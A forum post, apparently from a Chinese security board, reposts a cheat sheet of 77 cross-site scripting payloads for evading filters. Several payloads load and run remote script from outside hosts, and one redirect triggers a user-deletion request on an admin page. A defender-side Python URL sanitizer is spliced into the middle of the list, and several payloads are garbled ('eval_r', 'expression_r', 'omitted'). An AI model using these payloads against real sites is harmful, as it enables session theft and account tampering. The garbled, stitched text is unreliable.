There doesn't seem to be much XSS material on t00ls, so when I saw this good stuff I copied it over; not sure whether any of you need to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line JavaScript injection via embedded characters; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters basically have no effect here in China, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) Stylesheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with a link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32 & 34 & 39 & 160 & 8192-8 & 13 & 12288 & 65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
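A defender-side check for the scheme-obfuscation tricks in items 3 to 19 and 47 (mixed case, embedded tabs, newlines and carriage returns, NUL bytes, HTML character references with or without semicolons, leading whitespace), added here as an example; it is not part of the original post or of the cheat sheet. It normalizes an attribute value the way a browser does before reading its scheme and then allows only an allowlist of schemes; SAFE_SCHEMES and the exact ignored-character set are assumptions.

```python
import html
import re
from typing import Optional

# Schemes a src/href attribute may carry (an assumption for this example).
# Anything else, javascript: and vbscript: included, is rejected.
SAFE_SCHEMES = {"http", "https", "mailto"}

# Characters the browsers of this cheat sheet's era skipped inside a URL scheme:
# ASCII controls and space (0x00-0x20, so tab, LF, CR and NUL) plus the Unicode
# whitespace code points item 47 lists (160, 12288, 65279; U+2000-U+200A is my
# reading of its "8192-8" entry).
_IGNORED = re.compile(r"[\x00-\x20\xa0\u2000-\u200a\u3000\ufeff]")


def normalize_url(value: str) -> str:
    """Undo the decoding a browser does before it looks at the scheme."""
    # Decode HTML character references, with or without the trailing
    # semicolon (items 5, 9 and 10); loop so &amp;#106; is also resolved.
    for _ in range(4):
        decoded = html.unescape(value)
        if decoded == value:
            break
        value = decoded
    # Drop embedded tabs, newlines, CRs, NULs and leading spaces (items 11-19).
    return _IGNORED.sub("", value)


def url_scheme(value: str) -> Optional[str]:
    """Lower-cased scheme of the normalized URL, or None if it is relative."""
    m = re.match(r"^([a-z][a-z0-9+.-]*):", normalize_url(value), re.IGNORECASE)
    return m.group(1).lower() if m else None  # folds JaVaScRiPt (item 4)


def is_safe_url(value: str) -> bool:
    """Allow relative URLs and allowlisted schemes; reject everything else."""
    scheme = url_scheme(value)
    return scheme is None or scheme in SAFE_SCHEMES


if __name__ == "__main__":
    # Constructed samples modelled on the sheet's IMG SRC payloads.
    for sample in ("JaVaScRiPt:alert('XSS')", "jav\tascript:alert('XSS')",
                   "java\0script:alert('XSS')", "&#106;avascript:alert('XSS')",
                   " javascript:alert('XSS')", "http://3w.org/XSS/xss.js"):
        print(repr(sample), "->", "allowed" if is_safe_url(sample) else "blocked")
```

Protocol-relative values such as //host/path have no scheme of their own and pass as relative URLs; a stricter policy would check them against a host allowlist as well.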
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (consists of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside the Flash file, your XSS code can be smuggled in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS gets filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS (trailing dot)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>